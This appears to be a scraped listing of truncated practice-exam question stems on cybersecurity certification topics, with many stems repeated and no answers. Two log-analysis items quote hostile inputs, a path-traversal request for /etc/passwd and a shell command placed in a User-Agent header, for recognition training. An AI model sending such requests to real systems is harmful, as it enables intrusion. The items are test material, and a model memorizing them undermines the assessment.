A user tries to log in to a bank website using the address www.userbahk.com, which installs malware on the user's computer. However, when the user tries to log ...

A security team wants to work with the same organization’s development team to ensure WAF policies are automatically created when applications are deployed. Whi ...

Which of the following data types best describes an AI tool developed by a company to automate the ticketing system under a specific contract?

Which of the following is a component of a risk register?

A security officer observes that a software development team is not complying with its corporate security policy on encrypting confidential data. Which of the f ...

A security team receives reports about high latency and complete network unavailability throughout most of the office building. Flow logs from the campus switch ...

Which of the following uses proprietary controls and is designed to function in harsh environments over many years with limited remote access management?

A company wants to update its disaster recovery plan to include a dedicated location for immediate continued operations if a catastrophic event occurs. Which of ...

Which of the following tasks is typically included in the BIA process?

Which of the following describes effective change management procedures?

A company is planning a disaster recovery site and needs to ensure that a single natural disaster would not result in the complete loss of regulated backup data ...

Which of the following techniques would attract the attention of a malicious attacker in an insider threat scenario?

Which of the following makes IaC a preferred security architecture over traditional infrastructure models?

Which of the following is an example of a certificate that is generated by an internal source?

A security analyst is investigating an alert that was produced by endpoint protection software. The analyst determines this event was a false positive triggered ...

Which of the following techniques would identify whether data has been modified in transit?

Which of the following is the greatest advantage that network segmentation provides?

Which of the following can be used to mitigate attacks from high-risk regions?

Which of the following would help reduce the impact of a zero-day vulnerability in NAS installed on a large office network?

Which of the following would an organization most likely use to minimize the loss of data on a file server in the event that data needs to be restored due to lo ...

A government worker secretly copies classified files that contain defense tactics information to an external drive. The government worker then gives the externa ...

During the investigation of a webmail log-in using compromised credentials, a security analyst needs to review information about the source IP for the log-in. W ...

An organization purchases software from an overseas company. The organization’s IDS solution detects that advertising data from the software is unexpectedly rep ...

An administrator needs to perform server hardening before deployment. Which of the following steps should the administrator take? (Select two.)

A security analyst is working with an IT group to define appropriate procedures for the destruction of media and assets in the enterprise environment. Which of ...

A contractor is required to visually inspect the motherboards of all new servers that are purchased to determine whether the servers were tampered with. Which o ...

When trying to access an internal website, an employee reports that a prompt displays, stating that the site is insecure. Which of the following certificate typ ...

Which of the following attacks uses a website to collectively target a group of developers within an organization?

Employees sign an agreement that restricts specific activities when leaving the company. Violating the agreement can result in legal consequences. Which of the ...

After completing onboarding at a company and reviewing the company’s handbooks and AUP, an employee downloads an unapproved application on a company desktop. Wh ...

A penetration tester visits a client’s website and downloads the site’s content. Which of the following actions is the penetration tester performing?

During the onboarding process, an employee needs to create a password for an intranet account... Which of the following access management concepts is the compan ...

A company is considering an expansion of access controls for an application that contractors and internal employees use to reduce costs. Which of the following ...

An alert references attacks associated with a zero-day exploit. An analyst places a bastion host in the network to reduce the risk of the exploit. Which of the ...

Which of the following should be used to aggregate log data in order to create alerts and detect anomalous activity?

A systems administrator creates a script that validates OS version, patch levels, and installed applications when users log in. Which of the following examples ...

Which of the following elements of digital forensics should a company use if it needs to ensure the integrity of evidence?

A new employee accessed an unauthorized website. An investigation found that the employee violated the company’s rules. Which of the following did the employee ...

Which of the following digital forensics activities would a security team perform when responding to legal requests in a pending investigation?

Which of the following cryptographic solutions best protects the confidentiality and integrity of data?

A security analyst is evaluating a SaaS application that the human resources department would like to implement. The analyst requests a SOC 2 report from the Sa ...

A penetration test identifies that an SMBv1 is enabled on multiple servers across an organization. The organization wants to remediate this vulnerability in the ...

Which of the following describes the understanding between a company and a client about what will be provided and the accepted time needed to provide the compan ...

Which of the following control types describes an alert from a SIEM tool?

A group of developers has a shared backup account to access the source code repository. Which of the following is best way to secure the backup account if there ...

A company relies on open-source software libraries to build the software used by its customers. Which of the following vulnerability types would be the most dif ...

A security patch is applied to a server. Which of the following will validate this remediation?

A company uses a cloud-based platform for file storage and wants to ensure the security of its data in transit. Which of the following should the company verify ...

An employee from the accounting department logs in to the website used for processing the company's payments. After logging in, a new desktop application automa ...

Which of the following should a security analyst use to prioritize the remediation of a vulnerability?

A network engineer is increasing the overall security of network devices and needs to harden the devices. Which of the following will best accomplish this task?

Which of the following threat actors would most likely deface the website of a high-profile music group?

A customer changes the underlying file structure of a new mobile phone to install a keylogger with administrator permissions. Which of the following does this b ...

Which of the following aspects of the data management life cycle is most directly impacted by local and international regulations?

While browsing a web page, a user receives a pop-up with a link telling them to navigate to another site. To which of the following is the site vulnerable?

Which of the following is the best safeguard to protect against an extended power failure?

The internal audit team determines a software application is no longer in scope for external reporting requirements. Which of the following will document manage ...

Which of the following is a benefit of vendor diversity?

A business is expanding to a new country and must protect customers from accidental disclosure of specific national identity information. Which of the following ...

Which of the following best describe the benefits of a microservices architecture when compared to a monolithic architecture? (Select two.)

An unexpected and out-of-character email message from a Chief Executive Officer’s corporate account asked an employee to provide financial information and to ch ...

Which of the following is a component of a risk register?

Which of the following would be the greatest concern for a company that is aware of the consequences of non-compliance with government regulations?

For which of the following reasons would a systems administrator leverage a 3DES hash from an installer file that is posted on a vendor’s website?

While investigating logs, a security analyst finds that usernames, passwords, and IP addresses are being sent to a command-and-control server. Which of the foll ...

An external security assessment report indicates a high click rate on suspicious emails. The Chief Intelligence Security Officer (CISO) must reduce this behavio ...

A security administrator must use a strategy to protect the company’s data. The security administrator decides to deploy FDE on the end user devices and TLS for ...

A systems administrator just purchased multiple network devices. Which of the following should the systems administrator perform to prevent attackers from acces ...

An organization designs an inbound firewall with a fail-open configuration while implementing a website. Which of the following does the organization consider t ...

Which of the following activities are associated with vulnerability management?

A company plans to secure its systems by: Preventing users from sending sensitive data over corporate email Restricting access to potentially harmful websites ...

After creating a contract for IT contractors, the human resources department changed several clauses. The contract has gone through three revisions. Which of th ...

An organization is required to provide assurance that its controls are properly designed and operating effectively. Which of the following reports will best ach ...

An employee decides to take malicious action against an organization after being passed over for a promotion. Which of the following threats does the employee n ...

A company that has a large IT operation is looking to better control, standardize, and lower the time required to build new servers. Which of the following arch ...

Which of the following metrics impacts the backup schedule as part of the BIA?

Which of the following activities should a systems administrator perform to quarantine a potentially infected system?

An employee decides to collect PII data from the company's system for personal use. The employee compresses the data into a single encrypted file before sending ...

Which of the following receives logs from various devices and services, and then presents alerts?

An administrator is concerned about the amount of traffic during an upcoming event and must ensure that the site maintains consistent response times. Which of t ...

Which of the following exercises should an organization use to improve its incident response process?

Which of the following activities would involve members of the incident response team and other stakeholders simulating an event?

A service provider wants a cost-effective way to rapidly expand from providing internet links to managing them. Which of the following methods will allow the se ...

An administrator is estimating the cost associated with an attack that could result in the replacement of a physical server. Which of the following processes is ...

A security team must ensure that only TCP port 445 is accessible from a specific VLAN. Which of the following will accomplish this goal?

A company is working with a vendor to perform a penetration test. Which of the following includes an estimate about the number of hours required to complete the ...

A company decides to purchase an insurance policy. Which of the following risk management strategies is this company implementing?

At the start of a penetration test, the tester checks OSINT resources for information about the client environment. Which of the following types of reconnaissan ...

A university employee has logged on to an academic server and attempted to guess the system administrators' login credentials. Which of the following security m ...

After completing an annual external penetration test, a company receives the following guidance: Decommission two unused web servers currently exposed to the ...

A customer reports that software the customer downloaded from a public website has malware in it. However, the company that created the software denies any malw ...

An administrator discovers a cross-site scripting vulnerability on a company website. Which of the following will most likely remediate the issue?

Which of the following attacks primarily targets insecure networks?

During an investigation, a security analyst discovers traffic going out to a command-and-control server. The analyst must find out if any data exfiltration has ...

An organization wants to prevent software developers from updating production systems without prior approval. Which of the following procedures must the organiz ...

An organization suffered numerous multiday power outages at its current location. The Chief Executive Officer wants to create a disaster recovery strategy to re ...

An organization is adopting cloud services at a rapid pace and now has multiple SaaS applications in use. Each application has a separate login, so the security ...

Which of the following is the best way to securely store an encryption key for a data set in a manner that allows multiple entities to access the key when neede ...

Which of the following would be the most appropriate way to protect data in transit?

An organization has been experiencing issues with deleted network share data and improperly assigned permissions. Which of the following would best help track a ...

Which of the following will harden access to a new database system? (Select two)

A company is evaluating security solutions to improve threat inspection for the branch office. The solution needs to work on the application layer, but should n ...

Which of the following organizational documents is most often used to establish and communicate expectations associated with integrity and ethical behavior with ...

Which of the following technologies can achieve microsegmentation?

A large multinational corporation experienced a security breach. After the breach, the Chief Information Security Officer explains to the senior management team ...

An organization suffered numerous multiday power outages at its current location. The Chief Executive Officer wants to create a disaster recovery strategy to re ...

A security analyst developed a script to automate a trivial and repeatable task. Which of the following best describes the benefits of ensuring that other team ...

Which of the following is the most likely motivation for a hacktivist?

Which of the following cryptographic solutions would allow an organization to recover encrypted data after a key becomes corrupted or is deleted?

A few weeks after deploying additional email servers, a company begins to receive complaints from employees that messages they send are going into their recipie ...

Which of the following is a company addressing when it rolls out MDM on all COPE devices?

A company is planning a disaster recovery site and needs to ensure that a single natural disaster would not result in the complete loss of regulated backup data ...

A security team purchases a tool for cloud security posture management. The team is quickly overwhelmed by the number of misconfigurations that the tool detects ...

Which of the following cryptographic solutions best protects the confidentiality and integrity of data?

A company is changing its mobile device policy. The company has the following requirements: Company-owned devices Ability to harden the devices Reduced sec ...

The security team notices that the Always On VPN solution sometimes fails to connect. This leaves remote users unprotected because they cannot connect to the on ...

Which of the following should be used to ensure that a device is inaccessible to a network-connected resource?

An administrator must secure several end-of-life SCADA devices in a manufacturing facility on a limited budget. Which of the following should the security admin ...

Which of the following uses proprietary controls and is designed to function in harsh environments over many years with limited remote access management?

A United States-based cloud-hosting provider wants to expand its data centers to new international locations. Which of the following should the hosting provider ...

A new security regulation was announced that will take effect in the coming year. A company must comply with it to remain in business. Which of the following ac ...

A company evaluates several options that would allow employees to have remote access to the network. The security team wants to ensure the solution includes AAA ...

A security analyst sees an increase of vulnerabilities on workstations after a deployment of a company group policy. Which of the following vulnerability types ...

Which of the following allows for the attribution of messages to individuals?

A government agency requires publicly traded organizations to report cyber breaches within a designated time period. By law, these reports are made public. Whic ...

An attacker gained access to a virtual machine and was able to access the hypervisor. Which of the following describes this attack?

A network team is investigating failures to onboard users to a Wi-Fi network. The investigation shows that the access point accepts connections for a short time ...

An employee decides to take malicious action against an organization after being passed over for a promotion. Which of the following threats does the employee n ...

An external security assessment report indicates a high click rate on suspicious emails. The Chief Intelligence Security Officer (CISO) must reduce this behavio ...

Which of the following is the best security reason for closing service ports that are not needed?

An administrator is creating domain profiles for each employee within the company. The administrator wants to make the process more efficient by assigning permi ...

A company is evaluating security solutions to improve threat inspection for the branch office. The solution needs to work on the application layer, but should n ...

Which of the following can assist in recovering data if the decryption key is lost?

A user sits in a coffee shop on a government-issued laptop. A stranger starts a conversation with the user and starts asking about where the user works, what di ...

Which of the following would be the best solution to deploy a low-cost standby site that includes hardware and internet access?

Which of the following security concepts is being followed when implementing a product that offers protection against DDoS attacks?

Which of the following security controls is a company implementing by deploying HIPS?

A business manager is concerned about the availability of an application running on hardware in the local data center. Which of the following solutions will imp ...

Which of the following is the best physical security control to prevent damage from a vehicle?

Which of the following describes an agent-based application that detects and blocks malicious behavior on enterprise systems while disconnected from the corpora ...

Which of the following encryption methods protects data if a user loses their laptop?

A red-team provider tailgates into an organization's facility. Which of the following has occurred?

Which of the following security concepts is being followed when applying encryption to sensitive data?

A security team must ensure that only TCP port 445 is accessible from a specific VLAN. Which of the following will accomplish this goal?

A security team wants to work with the same organization's development team to ensure WAF policies are automatically created when applications are deployed. Whi ...

Which of the following would most likely prevent exploitation of an end-of-life, business-critical system?

Which of the following activities is included in the post-incident review phase?

During an investigation, a security analyst discovers traffic going out to a command-and-control server. The analyst must find out if any data exfiltration has ...

A user receives a malicious text message that routes to a fake bank login. Which of the following attack types does this scenario describe?

A penetration testing report indicated that an organization should implement controls related to database input validation. Which of the following best identifi ...

During the onboarding process, an employee needs to create a password for an intranet account. The password must include ten characters, numbers, and letters, a ...

An administrator is concerned about the amount of traffic during an upcoming event and must ensure that the site maintains consistent response times. Which of t ...

Which of the following are examples of operational controls that would be appropriate to implement in an environment where financial processing activities occur ...

While troubleshooting a firewall configuration, a technician determines that a "deny any" policy should be added to the bottom of the ACL. The technician update ...

After a company was compromised, customers initiated a lawsuit. The company's attorneys have requested that the security team initiate a legal hold in response ...

Which of the following is the most common data loss path for an air-gapped network?

Which of the following describes effective change management procedures?

A company is evaluating security solutions to improve threat inspection for the branch office. The solution needs to work on the application layer, but should n ...

Which of the following is the best way to improve the confidentiality of remote connections to an enterprise's infrastructure?

Attackers created a new domain name that looks similar to a popular file-sharing website. Which of the following threat vectors is being used?

Which of the following would be the best way to test resiliency in the event of a primary power failure?

An organization has recently decided to implement SSO. The requirements are to leverage access tokens and focus on application authorization rather than user au ...

Which of the following should a technician perform to verify the integrity of a file transferred from one device to another?

Which of the following would be the most appropriate way to protect data in transit?

An administrator learns that users are receiving large quantities of unsolicited messages. The administrator checks the content filter and sees hundreds of mess ...

Which of the following outlines the configuration, maintenance, and security roles between a cloud service provider and the customer?

During an investigation of a cloud-based webmail login using compromised credentials, a security analyst needs to review information about the source IP for the ...

Which of the following strategies most effectively protects sensitive data at rest in a database?

Which of the following risk management strategies is being used when a Chief Information Security Officer ignores known vulnerabilities identified during a risk ...

An IT team rolls out a new management application that uses a randomly generated MFA token that is sent to the administrator's phone. Despite this new MFA preca ...

An organization with multiple geographic locations has invested in various internet circuits at each location, including MPLS, 4G/5G, broadband, and dial-up. An ...

Which of the following teams combines both offensive and defensive testing techniques to protect an organization’s critical systems?

Which of the following is the best way to securely store an encryption key for a data set in a manner that allows multiple entities to access the key when neede ...

Which of the following is a feature of a next-generation SIEM system?

An administrator at a small business notices an increase in support calls from employees who receive a blocked page message after trying to navigate to a spoofe ...

Which of the following techniques can be used to sanitize the data contained on a hard drive while allowing for the hard drive to be repurposed?

A company’s antivirus solution is effective in blocking malware but often has false positives. The security team has spent a significant amount of time on inves ...

A network administrator deploys an FDE solution on all end user workstations. Which of the following data protection strategies does this describe?

While troubleshooting a firewall configuration, a technician determines that a "deny any" policy should be added to the bottom of the ACL. The technician update ...

An IT administrator needs to ensure data retention standards are implemented on an enterprise application. Which of the following describes the administrator's ...

A security analyst is investigating an alert that was produced by endpoint protection software. The analyst determines this event was a false positive triggered ...

A security analyst is investigating an application server and discovers that software on the server is behaving abnormally. The software normally runs batch job ...

Which of the following will harden access to a new database system? (Select two)

An IT manager is putting together a documented plan describing how the organization will keep operating in the event of a global incident. Which of the followin ...

A company receives an alert that a network device vendor, which is widely used in the enterprise, has been banned by the government. Which of the following will ...

A company has begun labeling all laptops with asset inventory stickers and associating them with employee IDs. Which of the following security benefits do these ...

An organization has been experiencing issues with deleted network share data and improperly assigned permissions. Which of the following would best help track a ...

Which of the following threat actors would most likely target an organization by using a logic bomb within an internally-developed application?

A company wants to protect a specialized legacy platform that controls the physical flow of gas inside of pipes. Which of the following environments does the co ...

A systems administrator is working on a solution with the following requirements: • Provide a secure zone. • Enforce a company-wide access control policy. • Red ...

After a security awareness training session, a user called the IT help desk and reported a suspicious call. The suspicious caller stated that the Chief Financia ...

A company performs a risk assessment on the information security program each year. Which of the following best describes this risk assessment?

Which of the following would a security analyst need to consider when prioritizing remediation efforts against known vulnerabilities?

A store is setting up wireless access for their employees. Management wants to limit the number of access points while ensuring all areas of the store are cover ...

Which of the following best describes why a company would erase a newly purchased device and install its own image with an operating system and applications?

Which of the following describes a security alerting and monitoring tool that collects system, application, and network logs from multiple sources in a centrali ...

For an upcoming product launch, a company hires a marketing agency whose owner is a close relative of the Chief Executive Officer. Which of the following did th ...

Which of the following is the most common data loss path for an air-gapped network?

A security analyst receives an alert from a web server that contains the following logs: GET /image?filename=../../../etc/passwd GET /image?filename=../../../ ...

A security manager needs an automated solution that will take immediate action to protect an organization against inbound malicious traffic. Which of the follow ...

A penetration testing report indicated that an organization should implement controls related to database input validation. Which of the following best identifi ...

Which of the following vulnerabilities would likely be mitigated by setting up an MDM platform?

During a routine audit, an analyst discovers that a department at a high school uses a simulation program that was not properly vetted before deployment. Which ...

Which of the following is a primary security concern for a company setting up a BYOD program?

A company needs to determine whether authentication weaknesses in a customer-facing web application exist. Which of the following is the best technique to use?

A company expects its provider to ensure servers and networks maintain 97% uptime. Which of the following will most likely list this expectation?

Which of the following is a risk of conducting a vulnerability assessment?

An enterprise is working with a third party and needs to allow access between the internal networks of both parties for a secure file migration. The solution ne ...

An organization is evaluating the cost of licensing a new solution to prevent ransomware. Which of the following is the most helpful in making this decision?

While troubleshooting an internal resource's poor performance for an end user, a network engineer performs a traceroute on the end device and receives the follo ...

A systems administrator is concerned about vulnerabilities within cloud computing instances. Which of the following is most important for the administrator to c ...

A security administrator wants to improve the reliability of the firewall connection at the company’s primary data center. Which of the following should the adm ...

A security manager created new documentation to use in response to various types of security incidents. Which of the following is the next step the manager shou ...

A security analyst and the management team are reviewing the organizational performance of a recent phishing campaign. The user click-through rate exceeded the ...

A security analyst is concerned malicious actors are lurking in an environment but has not received any alerts regarding suspicious activity. Which of the follo ...

A company phone with proprietary data used by an employee has been stolen. Which of the following can be used to remotely wipe the device?

Which of the following is a common data removal option for companies that want to wipe sensitive data from hard drives in a repeatable manner but allow the hard ...

Which of the following risks can be mitigated by HTTP headers?

Which of the following organizational documents is most often used to establish and communicate expectations associated with integrity and ethical behavior with ...

A software developer wants to implement an application security technique that will provide assurance of the application's integrity. Which of the following tec ...

A systems administrator successfully configures VPN access to a cloud environment. Which of the following capabilities should the administrator use to best faci ...

A Chief Information Security Officer has decided that purchasing insurance when the ALE of expected incidents exceeds $1 million is the most cost-effective appr ...

Which of the following non-production sites is an operational mirror of the primary data center and is ready for use if the primary data center experiences an o ...

Which of the following are cases in which an engineer should recommend the decommissioning of a network device? (Select two).

Remote users report that they are unable to log in to the VPN. The help desk confirms that each employee has a stable internet connection and correct permission ...

A penetration tester gained access to a server room by dressing as an engineer from a known third-party vendor. Which of the following types of penetration test ...

A newly identified network access vulnerability has been found in the OS of legacy IoT devices. Which of the following would best mitigate this vulnerability qu ...

Car vandalism repeatedly occurs near a specific part of a company’s ungated facility. Which of the following would provide the best physical deterrent? (Select ...

An organization needs to block certain information from view. Which of the following should the organization use to accomplish this task?

After a company was compromised, customers initiated a lawsuit. The company’s attorneys have requested that the security team initiate a legal hold in response ...

An important patch for a critical application has just been released, and a systems administrator is identifying all of the systems requiring the patch. Which o ...

A security manager created new documentation to use in response to various types of security incidents. Which of the following is the next step the manager shou ...

Which of the following cryptographic solutions is used to hide the fact that communication is occurring?

A systems administrator is creating a script that would save time and prevent human error when performing account creation for a large number of end users. Whic ...

Visitors to a company’s facilities are connecting to the company’s corporate network Wi-Fi and open network ports. Which of the following should the security en ...

A company hired a security consultant to suggest a device that will protect its inbound HTTP traffic by immediately blocking security violations. Which of the f ...

Which of the following are examples of operational controls that would be appropriate to implement in an environment where financial processing activities occur ...

Which of the following would be used to detect an employee who is emailing a customer list to a personal account before leaving the company?

A systems administrator creates a script that validates OS version, patch levels, and installed applications when users log in. Which of the following examples ...

During a penetration test in a hypervisor, the security engineer is able to use a script to inject a malicious payload and access the host filesystem. Which of ...

A company's antivirus solution is effective in blocking malware but often has false positives. The security team has spent a significant amount of time on inves ...

While troubleshooting a firewall configuration, a technician determines that a "deny any" policy should be added to the bottom of the ACL. The technician update ...

An administrator investigating an incident is concerned about the downtime of a critical server due to a failed drive. Which of the following would the administ ...

Which of the following hardening techniques must be applied on a container image before deploying it to a production environment? (Select two)

A site reliability engineer is designing a recovery strategy that requires quick failover to an identical site if the primary facility goes down. Which of the f ...

A United States-based cloud-hosting provider wants to expand its data centers to new international locations. Which of the following should the hosting provider ...

A company that has a large IT operation is looking to better control, standardize, and lower the time required to build new servers. Which of the following arch ...

Which of the following would most likely prevent exploitation of an end-of-life, business-critical system?

Attackers created a new domain name that looks similar to a popular file-sharing website. Which of the following threat vectors is being used?

An administrator learns that users are receiving large quantities of unsolicited messages. The administrator checks the content filter and sees hundreds of mess ...

Which of the following principles requires that a company must keep files or records for a prescribed period of time before it disposes of those files or record ...

A company purchased cyber insurance to address items listed on the risk register. Which of the following strategies does this represent?

A security operations center determines that the malicious activity detected on a server is normal. Which of the following activities describes the act of ignor ...

Which of the following techniques can be used to sanitize the data contained on a hard drive while allowing for the hard drive to be repurposed?

An IT team rolls out a new management application that uses a randomly generated MFA token that is sent to the administrator's phone. Despite this new MFA preca ...

Which of the following agreements defines response time, escalation points, and performance metrics?

Which of the following is a vulnerability concern for end-of-life hardware?

A company relies on open-source software libraries to build the software used by its customers. Which of the following vulnerability types would be the most dif ...

Which of the following would be the best way to test resiliency in the event of a primary power failure?

A company is required to use certified hardware when building networks. Which of the following best addresses the risks associated with procuring counterfeit ha ...

While reviewing a recent compromise, a forensics team discovers that there are hard-coded credentials in the database connection strings. Which of the following ...

An administrator at a small business notices an increase in support calls from employees who receive a blocked page message after trying to navigate to a spoofe ...

A security engineer would like to enhance the use of automation and orchestration within the SIEM. Which of the following would be the primary benefit of this e ...

Which of the following can best contribute to prioritizing patch applications?

While a school district is performing state testing, a security analyst notices all internet services are unavailable. The analyst discovers that ARP poisoning ...

A security analyst is reviewing logs and discovers the following: 149.34.228.10 - - [28/Jan/2023:16:32:45 -0300] "GET / HTTP/1.0" User-Agent: ${/bin/sh/ id} 20 ...

During an investigation of a cloud-based webmail login using compromised credentials, a security analyst needs to review information about the source IP for the ...

Which of the following would best ensure a controlled version release of a new software application?

A security analyst is investigating an alert that was produced by endpoint protection software. The analyst determines this event was a false positive triggered ...

Which of the following would be the most appropriate way to protect data in transit?

A penetration tester visits a client's website and downloads the site's content. Which of the following actions is the penetration tester performing?

Which of the following control types is AUP an example of?

Which of the following digital forensics activities would a security team perform when responding to legal requests in a pending investigation?

A company plans to secure its systems by: • Preventing users from sending sensitive data over corporate email • Restricting access to potentially harmful webs ...

An organization designs an inbound firewall with a fail-open configuration while implementing a website. Which of the following does the organization consider t ...

Which of the following teams combines both offensive and defensive testing techniques to protect an organization's critical systems?

After multiple phishing simulations, the Chief Security Officer announces a new program that incentivizes employees to not click phishing links in the upcoming ...

Which of the following is a feature of a next-generation SIEM system?

While updating the security awareness training, a security analyst wants to address issues created if vendors' email accounts are compromised. Which of the foll ...

An administrator discovers a cross-site scripting vulnerability on a company website. Which of the following will most likely remediate the issue?

A vendor salesperson is a personal friend of a company’s Chief Financial Officer (CFO). The company recently made a large purchase from the vendor, which was di ...

Which of the following is the best way to securely store an encryption key for a data set in a manner that allows multiple entities to access the key when neede ...

Which of the following is the greatest advantage that network segmentation provides?

Which of the following would best allow a company to prevent access to systems from the internet?

An employee from the accounting department logs in to the website used for processing the company’s payments. After logging in, a new desktop application automa ...

A user sends an email that includes a digital signature for validation. Which of the following security concepts would ensure a user cannot deny they sent the e ...

Which of the following strategies most effectively protects sensitive data at rest in a database?

A manager receives an external call from a vendor that needs the wireless network login information to fix an issue with the company’s network printer. Which of ...

Which of the following should be used to prevent changes to system-level data?

Which of the following should a technician perform to verify the integrity of a file transferred from one device to another?

Which of the following is most likely to be used as a just-in-time reference document within a security operations center?

Which of the following is the best safeguard to protect against an extended power failure?

A network administrator wants to ensure that network traffic is highly secure while in transit. Which of the following actions best describes the actions the ne ...

Which of the following would best prepare a security team for a specific incident response scenario?

A security engineer needs to quickly identify a signature from a known malicious file. Which of the following analysis methods would the security engineer most ...

Which of the following allows for the attribution of messages to individuals?

A security analyst must prevent remote users from accessing malicious URLs. The sites need to be checked inline for reputation, content, or categorization. Whic ...

A business is expanding to a new country and must protect customers from accidental disclosure of specific national identity information. Which of the following ...

A government worker secretly copies classified files that contain defense tactics information to an external drive. The government worker then gives the externa ...

Which of the following can assist in recovering data if the decryption key is lost?

The internal audit team determines a software application is no longer in scope for external reporting requirements. Which of the following will document manage ...

Which of the following is a benefit of launching a bug bounty program? (Select two).

During an investigation, a security analyst discovers traffic going out to a command-and-control server. The analyst must find out if any data exfiltration has ...

Which of the following is a reason environmental variables are a concern when reviewing potential system vulnerabilities?

A systems administrator creates a script that validates OS version, patch levels, and installed applications when users log in. Which of the following examples ...

Which of the following is a one-way function that provides assurance of data integrity?

A security practitioner completes a vulnerability assessment on a company’s network and finds several vulnerabilities, which the operations team remediates. Whi ...

Which of the following digital forensics activities would a security team perform when responding to legal requests in a pending investigation?

An employee from the accounting department logs in to the website used for processing the company’s payments. After logging in, a new desktop application automa ...

Which of the following metrics impacts the backup schedule as part of the BIA?

A penetration tester was able to gain unauthorized access to a hypervisor platform. Which of the following vulnerabilities was most likely exploited?

A United States-based cloud-hosting provider wants to expand its data centers to new international locations. Which of the following should the hosting provider ...

After a series of account compromises and credential misuse, a company hires a security manager to develop a security program. Which of the following steps shou ...

During an investigation, a security analyst discovers traffic going out to a command-and-control server. The analyst must find out if any data exfiltration has ...

While a school district is performing state testing, a security analyst notices all internet services are unavailable. The analyst discovers that ARP poisoning ...

A security analyst must prevent remote users from accessing malicious URLs. The sites need to be checked inline for reputation, content, or categorization. Whic ...

A company purchased cyber insurance to address items listed on the risk register. Which of the following strategies does this represent?

A user, who wants to watch a movie during a break at work, connects to a network switch using an Ethernet cable from a personal laptop. Which of the following s ...

Which of the following would best allow a company to prevent access to systems from the internet?

A penetration tester visits a client’s website and downloads the site’s content. Which of the following actions is the penetration tester performing?

A business is expanding to a new country and must protect customers from accidental disclosure of specific national identity information. Which of the following ...

A company plans to secure its systems by: • Preventing users from sending sensitive data over corporate email • Restricting access to potentially harmful webs ...

A company relies on open-source software libraries to build the software used by its customers. Which of the following vulnerability types would be the most dif ...

While reviewing a recent compromise, a forensics team discovers that there are hard-coded credentials in the database connection strings. Which of the following ...

Which of the following is the greatest advantage that network segmentation provides?

Which of the following would best prepare a security team for a specific incident response scenario?

While updating the security awareness training, a security analyst wants to address issues created if vendors' email accounts are compromised. Which of the foll ...

Which of the following agreements defines response time, escalation points, and performance metrics?

Which of the following hardening techniques must be applied on a container image before deploying it to a production environment? (Select two)

The internal audit team determines a software application is no longer in scope for external reporting requirements. Which of the following will document manage ...

An administrator discovers a cross-site scripting vulnerability on a company website. Which of the following will most likely remediate the issue?

Which of the following can best contribute to prioritizing patch applications?

Which of the following is a preventive physical security control?

Which of the following is the best way to securely store an encryption key for a data set in a manner that allows multiple entities to access the key when neede ...

A company that has a large IT operation is looking to better control, standardize, and lower the time required to build new servers. Which of the following arch ...

A user sends an email that includes a digital signature for validation. Which of the following security concepts would ensure a user cannot deny they sent the e ...

Which of the following would best ensure a controlled version release of a new software application?

Which of the following is a benefit of launching a bug bounty program? (Select two).

An IT team rolls out a new management application that uses a randomly generated MFA token that is sent to the administrator's phone. Despite this new MFA preca ...

Attackers created a new domain name that looks similar to a popular file-sharing website. Which of the following threat vectors is being used?

Which of the following techniques can be used to sanitize the data contained on a hard drive while allowing for the hard drive to be repurposed?

A security analyst is investigating an alert that was produced by endpoint protection software. The analyst determines this event was a false positive triggered ...

Which of the following control types is AUP an example of?

Which of the following allows for the attribution of messages to individuals?

Which of the following strategies most effectively protects sensitive data at rest in a database?

A security engineer needs to quickly identify a signature from a known malicious file. Which of the following analysis methods would the security engineer most ...

Which of the following is most likely to be used as a just-in-time reference document within a security operations center?

A business provides long-term cold storage services to banks that are required to follow regulator-imposed data retention guidelines. Banks that use these servi ...

Which of the following would help ensure a security analyst is able to accurately measure the overall risk to an organization when a new vulnerability is disclo ...

An administrator at a small business notices an increase in support calls from employees who receive a blocked page message after trying to navigate to a spoofe ...

Which of the following outlines the configuration, maintenance, and security roles between a cloud service provider and the customer?

Which of the following is a preventive physical security control?

Which of the following metrics impacts the backup schedule as part of the BIA?

An organization needs to block certain information from view. Which of the following should the organization use to accomplish this task?

Which of the following would be used to detect an employee who is emailing a customer list to a personal account before leaving the company?

Which of the following is a compensating control for providing user access to a high-risk website?

Which of the following are examples of operational controls that would be appropriate to implement in an environment where financial processing activities occur ...

A company phone with proprietary data used by an employee has been stolen. Which of the following can be used to remotely wipe the device?

Which of the following risk management strategies describes applying a compensating control to a device rather than patching?

After a company was compromised, customers initiated a lawsuit. The company's attorneys have requested that the security team initiate a legal hold in response ...

Visitors to a company’s facilities are connecting to the company’s corporate network Wi-Fi and open network ports. Which of the following should the security en ...

Car vandalism repeatedly occurs near a specific part of a company’s ungated facility. Which of the following would provide the best physical deterrent? (Select ...

Which of the following is a common data removal option for companies that want to wipe sensitive data from hard drives in a repeatable manner but allow the hard ...

Which of the following organizational documents is most often used to establish and communicate expectations associated with integrity and ethical behavior with ...

Which of the following non-production sites is an operational mirror of the primary data center and is ready for use if the primary data center experiences an o ...

An important patch for a critical application has just been released, and a systems administrator is identifying all of the systems requiring the patch. Which o ...

A software developer wants to implement an application security technique that will provide assurance of the application's integrity. Which of the following tec ...

A technician is setting up a public-facing web server and needs to ensure traffic is secure. Which of the following steps should the technician take to begin th ...

Which of the following is the best control to prevent a data center from being damaged by a vehicle?

A Chief Information Security Officer has decided that purchasing insurance when the ALE of expected incidents exceeds $1 million is the most cost-effective appr ...

A company hired a security consultant to suggest a device that will protect its inbound HTTP traffic by immediately blocking security violations. Which of the f ...

A newly identified network access vulnerability has been found in the OS of legacy IoT devices. Which of the following would best mitigate this vulnerability qu ...

Which of the following risks can be mitigated by HTTP headers?

A penetration tester gained access to a server room by dressing as an engineer from a known third-party vendor. Which of the following types of penetration test ...

A security analyst is evaluating a SaaS application that the human resources department would like to implement. The analyst requests a SOC 2 report from the Sa ...

Which of the following is a use of CVSS?

A security manager wants to reduce the number of steps required to identify and contain basic threats. Which of the following will help achieve this goal?

When used with an access control vestibule, which of the following would provide the best prevention against tailgating?

Which of the following is the best way to improve the confidentiality of remote connections to an enterprise's infrastructure?

Which of the following is a one-way function that provides assurance of data integrity?

Which of the following risk management strategies describes applying a compensating control to a device rather than patching?

After a company was compromised, customers initiated a lawsuit. The company's attorneys have requested that the security team initiate a legal hold in response ...

After failing an audit twice, an organization has been ordered by a government regulatory agency to pay fines. Which of the following caused this action?

Which of the following types of vulnerabilities is primarily caused by improper use and management of cryptographic certificates?

A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the management team ...

Which of the following is the best example of VM escape?

